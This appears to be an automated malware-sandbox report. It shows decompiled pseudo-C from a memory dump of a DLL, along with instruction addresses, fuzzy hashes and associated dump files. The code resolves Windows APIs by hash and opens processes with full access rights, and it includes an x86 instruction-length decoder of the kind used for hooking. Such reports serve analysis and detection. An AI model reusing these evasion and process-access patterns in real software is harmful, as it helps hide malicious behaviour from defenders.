							if(_t430 <= 0) {
								L29:
								_t437 = E6E713064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E70F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E70F828( *(_t449 + 4), E6E70F4CC( *_t449) + 4);
										 *(E6E70F4BC( *(_t449 + 4), E6E70F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E70F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E70F828( *((intOrPtr*)(_t449 + 0x74)), E6E70F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E70F4BC( *((intOrPtr*)(_t449 + 0x74)), E6E70F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E70F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E70F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E70F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E70F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E70F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E70F4BC(_t430, _t443);
										E6E7138F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E70F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E70F828(_t430, E6E70F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E713064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E70F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E70F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E70F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E70F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E70F4BC( *(_t449 + 4), _t445);
										E6E7138F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E70F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E70F828( *(_t449 + 4), E6E70F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E70F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e708435
0x6e70843b
0x6e70843f
0x6e708443
0x6e70844e
0x6e708452
0x6e708457
0x6e70845f
0x6e70846f
0x00000000
0x6e708471
0x6e708479
0x6e708480
0x6e708480
0x6e7089d3
0x6e7089d5
0x6e708a16
0x6e708a18
0x6e708a27
0x6e708a33
0x6e708a33
0x6e708a22
0x6e708a39
0x6e708a3e
0x00000000
0x6e708a3e
0x6e708a26
0x00000000
0x6e70848a
0x6e70848e
0x6e708491
0x6e708599
0x6e708599
0x6e70859e
0x6e7086c1
0x6e7086c5
0x6e7086ca
0x6e7086ce
0x6e7086d2
0x6e708808
0x6e70880a
0x6e70880e
0x6e708817
0x6e708822
0x6e708826
0x6e70882f
0x6e708834
0x6e70883a
0x6e70883b
0x6e70883f
0x6e708843
0x6e70884a
0x6e70884c
0x6e70898c
0x6e70899d
0x6e7089a4
0x6e7089ab
0x6e7089ab
0x6e7089ae
0x6e7089b1
0x6e7089b4
0x6e7089ba
0x6e7089c1
0x6e7089c5
0x6e7089ce
0x00000000
0x6e7089ce
0x6e7089bc
0x6e7089bf
0x6e7089d8
0x6e7089f0
0x6e7089f3
0x6e7089f8
0x6e708a02
0x6e708a05
0x6e708a08
0x6e708a11
0x00000000
0x6e708a11
0x00000000
0x6e7089bf
0x6e708854
0x6e708854
0x6e708856
0x6e70885a
0x6e70885f
0x6e708861
0x6e708865
0x6e708868
0x6e708870
0x6e708872
0x00000000
0x00000000
0x6e708889
0x6e7088a4
0x6e7088a6
0x6e7088b4
0x6e7088b9
0x6e7088bb
0x6e7088d8
0x6e7088d8
0x6e7088dc
0x6e7088de
0x00000000
0x00000000
0x6e7088e0
0x6e7088e3
0x6e708904
0x6e708923
0x6e708929
0x6e70892c
0x6e708931
0x6e708932
0x6e708939
0x00000000
0x00000000
0x6e708941
0x6e708941
0x6e708943
0x6e70894f
0x6e70895b
0x6e70897d
0x6e708982
0x6e708983
0x6e708983
0x00000000
0x6e708943
0x00000000
0x6e7088e3
0x6e7088bd
0x6e7088c3
0x6e7088c5
0x6e7088c6
0x6e7088c7
0x6e7088c8
0x6e7088cc
0x6e7088d0
0x6e7088d2
0x6e7088d3
0x6e7088d4
0x6e7088d6
0x00000000
0x00000000
0x00000000
0x6e7088d6
0x6e7088e9
0x00000000
0x6e7088e9
0x6e7086d8
0x6e7086da
0x6e7086dc
0x00000000
0x00000000
0x6e7086e6
0x6e7086e6
0x6e7086e8
0x6e7086eb
0x6e7086ed
0x6e7086f5
0x6e7086fc
0x6e708700
0x6e708703
0x00000000
0x00000000
0x6e7087ff
0x6e708800
0x6e708802
0x00000000
0x00000000
0x00000000
0x6e708802
0x6e708709
0x6e70870c
0x6e708715
0x6e70871a
0x6e70871c
0x6e708728
0x6e70872c
0x6e708731
0x6e708735
0x6e708b12
0x6e708b26
0x6e708b48
0x6e708b4d
0x6e708b4d
0x6e70874b
0x6e708750
0x6e708754
0x6e708754
0x6e708754
0x6e708754
0x6e708759
0x6e70875e
0x6e708760
0x6e708764
0x6e70876b
0x6e708770
0x6e708772
0x6e708ad3
0x6e708ae2
0x6e708afb
0x6e708b00
0x6e708b00
0x6e708785
0x6e70878a
0x6e70878e
0x6e70878e
0x6e70878e
0x6e7087a0
0x6e7087c1
0x6e7087c9
0x6e7087d7
0x6e7087f5
0x6e7087fb
0x6e7087fb
0x00000000
0x6e70870c
0x6e7085a4
0x6e7085a4
0x6e7085a6
0x6e7085ad
0x6e7085bb
0x6e7085bd
0x6e7085c1
0x6e7085c3
0x6e7085c5
0x6e708600
0x6e70860f
0x6e708611
0x6e708613
0x6e708631
0x6e708633
0x6e708635
0x6e708647
0x6e708665
0x6e70866e
0x6e708671
0x6e70867f
0x6e708690
0x6e7086ae
0x6e7086b0
0x6e7086b4
0x6e7086b4
0x6e7086b4
0x6e708635
0x00000000
0x6e708613
0x6e7085cb
0x6e7085cb
0x6e7085d0
0x6e7085d7
0x6e7085e6
0x6e7085ed
0x6e7085ef
0x00000000
0x00000000
0x6e7085fb
0x6e7085fc
0x6e7085fe
0x00000000
0x00000000
0x00000000
0x6e7085fe
0x6e7085f1
0x6e7085f4
0x00000000
0x00000000
0x6e7086b6
0x6e7086b6
0x6e7086b7
0x6e7086b7
0x00000000
0x6e708497
0x6e708497
0x6e708497
0x6e708499
0x6e7084a0
0x6e7084ae
0x6e7084b0
0x6e7084b4
0x6e7084b6
0x6e7084e2
0x6e7084e6
0x6e7084eb
0x6e7084f0
0x6e7084f4
0x6e7084f8
0x6e7084ff
0x6e708504
0x6e708506
0x6e708a95
0x6e708aa4
0x6e708ac3
0x6e708ac8
0x6e708ac8
0x6e708519
0x6e70851e
0x6e708522
0x6e708522
0x6e708522
0x6e708533
0x6e708535
0x6e708537
0x6e708548
0x6e708548
0x6e70854d
0x6e708552
0x6e708556
0x6e70855b
0x6e708562
0x6e708567
0x6e708569
0x6e708a57
0x6e708a63
0x6e708a7d
0x6e708a82
0x6e708a82
0x6e70857f
0x6e708584
0x6e708588
0x6e708588
0x6e708588
0x6e708588
0x6e70858b
0x6e70858b
0x00000000
0x6e70858b
0x6e7084ba
0x6e7084ba
0x6e7084bc
0x6e7084c8
0x6e7084cf
0x6e7084d1
0x00000000
0x00000000
0x6e7084dd
0x6e7084de
0x6e7084e0
0x00000000
0x00000000
0x00000000
0x6e7084e0
0x6e7084d3
0x6e7084d6
0x00000000
0x00000000
0x6e70858c
0x6e708590
0x6e708591
0x6e708591
0x00000000
0x6e708499
0x6e708491

Strings

, xrefs: 6E708A1A

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: eddfe56e1fc43d4c36832ce72eec92610ef04a4ed6c8518582686a8d12e20a08
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: 11126DB12083059FD758DFA4CAD4AAEB7E9AF84318F104D2DF999872B1DB309C05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6E719370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E719370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E713698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e719377
0x6e71937b
0x6e719387
0x6e71938b
0x6e71938f
0x6e719394
0x6e719397
0x6e719399
0x6e71939b
0x6e71939b
0x6e71939e
0x6e7193a4
0x6e71941c
0x6e719420
0x6e719423
0x6e719423
0x6e719426
0x00000000
0x6e719426
0x6e7193ab
0x6e719413
0x6e719417
0x00000000
0x6e719417
0x6e7193b2
0x6e71940b
0x6e71940e
0x00000000
0x6e71940e
0x6e7193b7
0x6e7193f5
0x6e7193fc
0x6e7193ff
0x6e7193c8
0x6e7193c8
0x6e7193ce
0x00000000
0x00000000
0x6e7193d3
0x6e7193ed
0x6e7193f0
0x00000000
0x6e7193f0
0x6e7193d8
0x00000000
0x6e7193da
0x6e7193de
0x6e7193e1
0x00000000
0x6e7193e1
0x6e7193d8
0x6e719429
0x6e719429
0x6e719429
0x6e719432
0x6e71943b
0x6e71943e
0x6e719441
0x6e719444
0x6e719447
0x6e71944d
0x6e71948f
0x6e719492
0x6e719493
0x6e71949a
0x6e71949d
0x6e71944f
0x6e719453
0x6e71945d
0x6e719464
0x6e719466
0x6e71947f
0x6e719482
0x6e719482
0x6e719464
0x6e7194a5
0x6e7194a8
0x6e7194ab
0x6e7194af
0x6e7194b3
0x6e7194bd
0x6e7194c1
0x6e7194cb
0x6e7194d4
0x6e7194e1
0x6e7194e4
0x6e7194e7
0x6e7194e7
0x6e7194f3
0x6e7194fe
0x6e719504
0x6e719508
0x6e7194f5
0x6e7194f5
0x6e7194f5
0x6e719510
0x6e71953a
0x6e719540
0x6e719540
0x6e719548
0x6e7198f1
0x6e7198f7
0x6e7198fd
0x6e7198fd
0x00000000
0x6e71954e
0x6e71954e
0x6e719552
0x6e719555
0x6e719558
0x6e71955b
0x6e71955f
0x6e719561
0x6e719564
0x6e719567
0x6e71956b
0x6e719570
0x6e719573
0x6e719577
0x6e71957c
0x6e71957f
0x6e719581
0x6e719584
0x6e719588
0x6e71958d
0x6e71959d
0x6e7195a3
0x6e7195a3
0x6e7195ab
0x6e7195ad
0x6e7195b6
0x6e7195b8
0x6e7195bb
0x6e7195c6
0x6e7195f3
0x6e7195c8
0x6e7195df
0x6e7195df
0x6e7195fb
0x6e719601
0x6e719607
0x6e719607
0x6e7195fb
0x6e7195b6
0x6e71960e
0x6e71967f
0x6e719684
0x6e7196dd
0x6e71979f
0x6e7197a4
0x6e7197b3
0x6e7197b9
0x6e7197bd
0x6e7197c6
0x6e7197cd
0x6e7197d6
0x6e7197e4
0x6e7197e7
0x6e7197cf
0x6e7197cf
0x6e7197cf
0x6e7197cd
0x6e7197f0
0x6e71981d
0x6e719830
0x6e719838
0x6e71981f
0x6e719821
0x6e719829
0x6e719829
0x6e7197f2
0x6e7197f7
0x6e719816
0x6e7197f9
0x6e7197fe
0x6e71980f
0x6e719800
0x6e719800
0x6e719800
0x6e7197fe
0x6e7197f7
0x6e719840
0x6e71984f
0x6e71985c
0x6e719865
0x6e719869
0x6e71986d
0x6e719870
0x6e719873
0x6e719876
0x6e719879
0x6e71987c
0x6e719882
0x6e719886
0x6e71988c
0x6e71988c
0x6e719882
0x6e719892
0x6e7198cf
0x6e7198d3
0x6e7198da
0x6e7198e0
0x6e719894
0x6e719897
0x6e7198b7
0x6e7198bb
0x6e7198c2
0x6e7198c9
0x6e719899
0x6e71989c
0x6e71989e
0x6e7198a2
0x6e7198ac
0x6e7198b2
0x6e7198b2
0x6e71989c
0x6e719897
0x6e7198e7
0x6e7198e7
0x6e719900
0x6e719900
0x6e719906
0x6e71990b
0x6e719965
0x6e71996a
0x6e7199a9
0x6e7199ae
0x6e7199b0
0x6e7199b4
0x6e7199b7
0x6e7199ba
0x6e7199bc
0x6e7199bd
0x6e7199bd
0x6e7199c2
0x6e7199e0
0x6e7199e2
0x6e7199e6
0x6e7199ec
0x6e7199ef
0x6e7199f1
0x6e7199f2
0x6e7199f2
0x00000000
0x6e7199c4
0x6e7199c4
0x6e7199c4
0x6e7199c8
0x6e7199ce
0x6e7199d1
0x6e7199d3
0x6e7199d6
0x6e7199f5
0x6e7199f5
0x6e7199fc
0x6e719a16
0x6e7199fe
0x6e7199fe
0x6e719a0a
0x6e719a0b
0x6e719a0e
0x6e719a0e
0x6e719a24
0x6e719a24
0x6e7199c2
0x6e71996f
0x6e71997d
0x6e719995
0x6e719999
0x6e71999c
0x6e7199a2
0x6e7199a6
0x6e7199a6
0x00000000
0x6e7199a6
0x6e71997f
0x6e719983
0x6e719989
0x6e719989
0x6e71998f
0x00000000
